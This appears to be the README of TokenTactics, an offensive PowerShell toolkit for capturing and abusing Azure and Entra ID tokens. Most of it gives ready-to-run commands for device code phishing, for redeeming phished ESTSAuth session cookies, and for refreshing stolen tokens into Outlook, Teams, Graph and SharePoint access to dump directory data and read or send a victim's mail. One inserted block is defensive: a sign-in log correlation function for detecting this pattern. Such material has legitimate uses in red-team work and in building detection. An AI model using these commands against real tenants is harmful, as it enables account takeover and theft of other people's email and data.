Azure JSON Web Token ("JWT") Manipulation Toolset
Azure access tokens allow you to authenticate to certain endpoints as a user who signs in with a device code, even if they used multi-factor authentication. Once you have a user's access token, it may be possible to access certain apps such as Outlook, SharePoint, OneDrive, MS Teams and more.
For instance, if you have a Graph or MSGraph token, you can then connect to Azure and dump users, groups, etc. You could then, depending on conditional access policies, switch to an Azure Core Management token and run AzureHound. Then, switch to an Outlook token and read/send emails, or to an MS Teams token and read/send messages!
For more on Azure token types, see Microsoft identity platform access tokens.
There are some example requests to endpoints in the resources folder. There is also an example phishing template for device code phishing.
You may also use these tokens with AAD Internals. We strongly recommend checking this amazing tool out.
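```powershell
# Load the module and show the help for a function
Import-Module .\TokenTactics.psd1
Get-Help Get-AzureToken
Invoke-RefreshToSubstrateToken
```

```powershell
# Start a device code sign-in for the MSGraph client
Get-AzureToken -Client MSGraph
```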
Once the user has logged in, you'll be presented with the JWT and it will be saved in the `$response` variable. To access the access token, use `$response.access_token` from your PowerShell window to display the token. You may also display the refresh token with `$response.refresh_token`. Hint: You'll want the refresh token to keep refreshing to new access tokens! By default, Get-AzureToken results are logged to TokenLog.log.
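From the detection side, the sequence described above (a device code sign-in, then tokens for several different resources issued to the same user and client shortly after) can be looked for in sign-in logs. The following is an added example, not part of TokenTactics: the records are constructed, and the field names (`TimeGenerated`, `UserPrincipalName`, `AppId`, `ResourceDisplayName`, `AuthenticationProtocol`), the placeholder client ID and the resource names are assumptions modeled on Entra ID sign-in log exports.

```powershell
# Constructed sample records, not real log data. Field names are assumptions
# modeled on Entra ID sign-in log exports; map them to your own schema.
$sample = @'
TimeGenerated,UserPrincipalName,AppId,ResourceDisplayName,AuthenticationProtocol
2024-05-01T09:00:00,alice@myclient.org,00000000-0000-0000-0000-000000000001,Microsoft Graph,deviceCode
2024-05-01T09:04:00,alice@myclient.org,00000000-0000-0000-0000-000000000001,Azure Core Management,none
2024-05-01T09:07:00,alice@myclient.org,00000000-0000-0000-0000-000000000001,Outlook,none
2024-05-01T09:02:00,bob@myclient.org,00000000-0000-0000-0000-000000000001,Microsoft Graph,none
2024-05-01T10:00:00,carol@myclient.org,00000000-0000-0000-0000-000000000001,Microsoft Graph,deviceCode
'@ | ConvertFrom-Csv

function Find-DeviceCodeResourcePivot {
    # Hypothetical helper: flags a user/client pair whose device code sign-in
    # is followed, within $Window, by sign-ins to $MinResources or more resources.
    param(
        [Parameter(Mandatory)] [object[]] $SignIn,
        [timespan] $Window = [timespan]::FromHours(1),
        [int] $MinResources = 3
    )
    # Add a typed Time property so sorting and comparison are chronological.
    $rows = $SignIn | Select-Object *, @{ n = 'Time'; e = { [datetime]$_.TimeGenerated } }
    foreach ($group in @($rows | Group-Object UserPrincipalName, AppId)) {
        $events = @($group.Group | Sort-Object Time)
        foreach ($start in @($events | Where-Object AuthenticationProtocol -eq 'deviceCode')) {
            $end = $start.Time + $Window
            # Distinct resources reached from the device code sign-in onward.
            $resources = @($events |
                Where-Object { $_.Time -ge $start.Time -and $_.Time -le $end } |
                Select-Object -ExpandProperty ResourceDisplayName -Unique)
            if ($resources.Count -ge $MinResources) {
                [pscustomobject]@{
                    UserPrincipalName = $start.UserPrincipalName
                    AppId             = $start.AppId
                    DeviceCodeAt      = $start.Time
                    Resources         = $resources -join ', '
                }
            }
        }
    }
}

# alice is flagged (three resources after a device code sign-in);
# bob (no device code) and carol (one resource) are not.
Find-DeviceCodeResourcePivot -SignIn $sample | Format-List
```

Refresh-token redemptions are typically recorded in the non-interactive sign-in log, so both interactive and non-interactive records need to be fed in for the correlation to work.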
```powershell
Get-AzureToken -Client DODMSGraph
```

```powershell
Get-AzureTokenFromESTSCookie -estsAuthCookie "0.AbcApTk..."
```

This module uses authorization code flow to obtain an access token and refresh token using an ESTSAuth (or ESTSAuthPersistent) cookie. Useful if you have phished a session via Evilginx or have otherwise obtained this cookie.
Be sure to use the right cookie! `ESTSAuthPersistent` is only useful when a CA policy actually grants a persistent session. Otherwise, you should use `ESTSAuth`. You can usually tell which one to use based on length: the longer cookie is the one you want to use :)
Note: This may not work in all cases as it may require user interaction. If this is the case, either use the Device Code flow above, or try roadtx interactiveauth --estscookie
```powershell
Invoke-RefreshToOutlookToken -domain myclient.org -refreshToken 0.A
$OutlookToken.access_token
```

```powershell
Connect-AzureAD -AadAccessToken $response.access_token -AccountId user@myclient.org
```
Once a PRT has been captured, auth with roadrecon to obtain your access_token and refresh_token. When refreshing with TokenTactics, use ClientID 1b730954-1685-4b74-9bfd-dac224a7b894.
```powershell
Invoke-RefreshToMSGraphToken -domain myclient.org -ClientId 1b730954-1685-4b74-9bfd-dac224a7b894 -refreshToken 0.A
```

```powershell
Invoke-ClearToken -Token All
```
```
Get-Command -Module TokenTactics

CommandType     Name                                        Version    Source
-----------     ----                                        -------    ------
Function        Get-AzureToken                              0.0.2      TokenTactics
Function        Get-AzureTokenFromESTSCookie                0.0.2      TokenTactics
Function        Invoke-ClearToken                           0.0.2      TokenTactics
Function        Invoke-DumpOWAMailboxViaMSGraphApi          0.0.2      TokenTactics
Function        Invoke-ForgeUserAgent                       0.0.2      TokenTactics
Function        Invoke-OpenOWAMailboxInBrowser              0.0.2      TokenTactics
Function        Invoke-ParseJWTtoken                        0.0.2      TokenTactics
Function        Invoke-RefreshToAzureCoreManagementToken    0.0.2      TokenTactics
Function        Invoke-RefreshToAzureManagementToken        0.0.2      TokenTactics
Function        Invoke-RefreshToDODMSGraphToken             0.0.2      TokenTactics
Function        Invoke-RefreshToGraphToken                  0.0.2      TokenTactics
Function        Invoke-RefreshToMAMToken                    0.0.2      TokenTactics
Function        Invoke-RefreshToMSGraphToken                0.0.2      TokenTactics
Function        Invoke-RefreshToMSManageToken               0.0.2      TokenTactics
Function        Invoke-RefreshToMSTeamsToken                0.0.2      TokenTactics
Function        Invoke-RefreshToOfficeAppsToken             0.0.2      TokenTactics
Function        Invoke-RefreshToOfficeManagementToken       0.0.2      TokenTactics
Function        Invoke-RefreshToOutlookToken                0.0.2      TokenTactics
Function        Invoke-RefreshToSharepointOnlineToken       0.0.2      TokenTactics
Function        Invoke-RefreshToSubstrateToken              0.0.2      TokenTactics
Function        Invoke-RefreshToYammerToken                 0.0.2      TokenTactics
```
- @0xBoku co-author and researcher.
TokenTactics' methods are highly influenced by the great research of Dr Nestori Syynimaa at https://o365blog.com/.